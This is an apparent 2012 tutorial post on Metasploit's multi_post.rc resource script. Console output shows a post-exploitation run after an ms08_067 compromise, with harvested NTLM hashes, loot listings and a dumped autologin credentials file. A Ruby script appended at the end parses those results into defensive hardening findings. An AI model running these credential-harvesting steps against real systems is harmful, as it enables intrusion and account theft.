METASPLOIT rc files 2
Posted on 2012-10-2 16:03:57
Let's use one of the default RC files as a demonstration.
    root@Dis9Team:/pen/msf3/scripts/resource# pwd
    /pen/msf3/scripts/resource
    root@Dis9Team:/pen/msf3/scripts/resource# cat multi_post.rc
Its purpose is to run a large number of post-exploitation modules, so let's try it.
The official resource scripts include these (press Tab after "resource" to list them):
    meterpreter > resource
    resource .svn                    resource nessus_vulns_cleaner.rc
    resource auto_brute.rc           resource oracle_login.rc
    resource auto_cred_checker.rc    resource oracle_sids.rc
    resource auto_pass_the_hash.rc   resource oracle_tns.rc
    resource autocrawler.rc          resource port_cleaner.rc
    resource autoexploit.rc          resource portscan.rc
    resource basic_discovery.rc      resource run_all_post.rc
    resource fileformat_generator.rc resource wmap_autotest.rc
    resource multi_post.rc


Run it:
    meterpreter > background
    [*] Backgrounding session 1...
    msf  exploit(ms08_067_netapi) > resource multi_post.rc
    [*] Processing multi_post.rc for ERB directives.
    [*] resource (multi_post.rc)> Ruby Code (3930 bytes)
    [*] starting with post exploitation stuff
    starting meterpreter commands on session number 1
    running meterpreter command sysinfo

    running meterpreter command getuid

    running meterpreter command getpid

    running meterpreter command ps

    running meterpreter command ipconfig

    [*] starting the post exploitation with post exploitation modules
    [*] Session ID: 1 - IP: 5.5.5.3
    SESSION => 1
    [*] Post module running as background job
    [-] Failed to load module: post/multi/gather/ssh_creds
    SESSION => 1
    [*] Post module running as background job
    SESSION => 1
    [*] Post module running as background job
    SESSION => 1
    [*] Post module running as background job
    SESSION => 1
    [*] Post module running as background job
    SESSION => 1
    [*] Post module running as background job
    SESSION => 1
    [*] Post module running as background job
    SESSION => 1
    [-] Post failed: Msf::OptionValidateError The following options failed to validate: GROUP.
    SESSION => 1
    [*] Post module running as background job
    SESSION => 1
    [*] Post module running as background job
    SESSION => 1
    [*] Post module running as background job
    SESSION => 1
    [*] Post module running as background job
    SESSION => 1
    [*] Post module running as background job
    SESSION => 1
    [*] Post module running as background job
    SESSION => 1
    [*] Post module running as background job
    SESSION => 1
    [*] Post module running as background job
    SESSION => 1
    [*] Post module running as background job
    SESSION => 1
    [*] Post module running as background job
    SESSION => 1
    [*] Post module running as background job
    SESSION => 1
    [*] Post module running as background job
    SESSION => 1
    [*] Post module running as background job
    SESSION => 1
    [*] Post module running as background job
    msf >


View the jobs:

    msf > jobs

    Jobs
    ====

      Id  Name
      --  ----
      16  Post: windows/gather/enum_services
      19  Post: windows/gather/enum_devices

    msf >


View the results:
    msf > creds

    Credentials
    ===========

    host     port  user              pass                                                               type      active?
    ----     ----  ----              ----                                                               ----      -------
    5.5.5.3  445   brk               aad3b435b51404eeaad3b435b51404ee:3766ecc9dc50a0a090a75679f31c4b3a  smb_hash  true
    5.5.5.3  445   123456            8b86e21cefcfcf65ecd325169ec0434c:d342530f678ab7fbc07aca16546fff1d  smb_hash  true
    5.5.5.3  445   Administrator     d50be5c283a925b9d8341d61ed718f0f:3d33ff03e9ae50a031e9e0b7d83a9be1  smb_hash  true
    5.5.5.3  445   HelpAssistant     5ad7c2ebeb03e4f9e490a7484285e4d7:013dac1c0a4a4d849d73526d1076f725  smb_hash  true
    5.5.5.3  445   SUPPORT_388945a0  aad3b435b51404eeaad3b435b51404ee:aeaa2735ff0d4c78acc2c7e8fef81de2  smb_hash  true

    [*] Found 5 credentials.
    msf >


Detailed results:

    msf > loot

    Loot
    ====

    host     service  type                          name                              content     info                                path
    ----     -------  ----                          ----                              -------     ----                                ----
    5.5.5.3           host.ms_keys                  ms_keys.txt                       text/plain  Microsoft Product Key and Info      /root/.msf4/loot/20120716082020_default_5.5.5.3_host.ms_keys_763590.txt
    5.5.5.3           host.users.recent             recent_users.txt                  text/plain  Recent Users                        /root/.msf4/loot/20120716082018_default_5.5.5.3_host.users.recen_211339.txt
    5.5.5.3           host.applications             applications.txt                  text/plain  Installed Applications              /root/.msf4/loot/20120716082017_default_5.5.5.3_host.application_749067.txt
    5.5.5.3           windows.autologin.user.creds  windows-autologin-user-creds.csv  text/csv    Windows AutoLogin User Credentials  /root/.msf4/loot/20120716082017_default_5.5.5.3_windows.autologi_637637.csv
    5.5.5.3           host.users.active             active_users.txt                  text/plain  Active Users                        /root/.msf4/loot/20120716082017_default_5.5.5.3_host.users.activ_588678.txt
    5.5.5.3           windows.environment                                             text/plain                                      /root/.msf4/loot/20120716082016_default_5.5.5.3_windows.environm_369903.txt
    5.5.5.3           windows.environment                                             text/plain                                      /root/.msf4/loot/20120716082016_default_5.5.5.3_windows.environm_464320.txt
    5.5.5.3           hosts.confige                 hosts_file.txt                    text/plain  Windows Hosts File                  /root/.msf4/loot/20120716082015_default_5.5.5.3_hosts.confige_087381.txt
    5.5.5.3           windows.hashes                WWWDIS9COM_hashes.txt             text/plain  Windows Hashes                      /root/.msf4/loot/20120716082014_default_5.5.5.3_windows.hashes_482830.txt

    msf >


View one of the loot files:
5.5.5.3 windows.autologin.user.creds windows-autologin-user-creds.csv text/csv Windows AutoLogin User Credentials /root/.msf4/loot/20120716082017_default_5.5.5.3_windows.autologi_637637.csv
    msf > cat /root/.msf4/loot/20120716082017_default_5.5.5.3_windows.autologi_637637.csv
    [*] exec: cat /root/.msf4/loot/20120716082017_default_5.5.5.3_windows.autologi_637637.csv

    UserName,Password,Domain
    "brk","","WWWDIS9COM"
    "brk","","WWWDIS9COM"
    msf >
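
The `creds` table shown earlier is the output a defender can turn into hardening findings. As an added example (not part of the original post; the rows, usernames and hashes are constructed, only the two empty-value constants are real), this Ruby script parses that column layout and reports accounts with a stored LM hash, an empty password, or a password shared with another account.

```ruby
# Added example: turn `creds` smb_hash rows into hardening findings.
# Rows below are constructed in the page's column layout; usernames and
# hashes are made up, apart from the two well-known constants.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee" # LM value when no LM hash is stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0" # NT hash of an empty password
REAL_LM  = "0123456789abcdef0123456789abcdef" # constructed
REUSED   = "ffeeddccbbaa99887766554433221100" # constructed

SAMPLE_CREDS = <<~OUT
  host     port  user        pass  type      active?
  ----     ----  ----        ----  ----      -------
  5.5.5.3  445   alice       #{EMPTY_LM}:00112233445566778899aabbccddeeff  smb_hash  true
  5.5.5.3  445   bob         #{REAL_LM}:#{REUSED}  smb_hash  true
  5.5.5.3  445   svc_backup  #{REAL_LM}:#{REUSED}  smb_hash  true
  5.5.5.3  445   guest       #{EMPTY_LM}:#{EMPTY_NT}  smb_hash  true
OUT

HASH_PAIR = /\A([0-9a-f]{32}):([0-9a-f]{32})\z/i

# Whitespace-split parser: assumes usernames contain no spaces.
def parse_creds(text)
  text.each_line.map do |line|
    host, port, user, pass, type = line.split
    next unless type == "smb_hash" && (m = HASH_PAIR.match(pass))
    { host: host, port: port.to_i, user: user, lm: m[1].downcase, nt: m[2].downcase }
  end.compact
end

# Per-account findings. A stored LM hash means the NoLMHash policy
# ("Do not store LAN Manager hash value on next password change") is not in effect.
def findings(rows)
  rows.flat_map do |r|
    out = []
    out << [r[:user], :lm_hash_stored] unless r[:lm] == EMPTY_LM
    out << [r[:user], :empty_password] if r[:nt] == EMPTY_NT
    out
  end
end

# NT hashes are unsalted, so identical hashes mean identical passwords.
def shared_passwords(rows)
  rows.group_by { |r| r[:nt] }.values.select { |g| g.size > 1 }.map { |g| g.map { |r| r[:user] } }
end

if __FILE__ == $PROGRAM_NAME
  rows = parse_creds(SAMPLE_CREDS)
  findings(rows).each { |user, issue| puts "#{user}: #{issue}" }
  shared_passwords(rows).each { |users| puts "same password: #{users.join(', ')}" }
end
```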


